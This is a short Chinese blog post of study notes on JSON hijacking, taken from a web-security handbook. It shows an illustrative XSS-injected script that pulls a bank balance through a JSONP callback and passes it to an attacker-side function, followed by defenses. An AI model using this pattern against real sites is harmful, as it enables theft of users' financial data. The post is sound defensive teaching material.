黑客攻防技术宝典 — Notes 9.4 针对客户端的攻击 — JSON挟持

Leave a Comment / Security / July 2, 2010

攻:

如果网银中的“显示余额”功能是用 Ajax + JSON 做的,就可以按照 XSRF 的方式窃取这个信息.

   1.用户登录网银了

   2.然后他去一个论坛

   3.论坛里有篇文章,其中有人利用XSS漏洞注入了一个脚本

        <script>

             var script = document.createElement("script");

             script.src = "http://…/查看我的余额.json?
callback=sendToAttacker";

             document.getElelementsByTag("head")[0].appendChild(script);

             function
sendToAttacker(jsonData){

                 //jsonData.余额

                 sendToMySite(jsonData.余额)

             }

            

        </script> 

   4.用户查看这篇文章,中标

============================================================

防:

  1.能防RF,就能防JSON挟持

  2.故意在JSON数据前面弄点乱七八糟的东西,这样就导致 script.scr=查看.json 出错,但浏览器拿到JSON时却不会出错

  3.使“查看余额.json”只支持POST

Leave a Comment

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.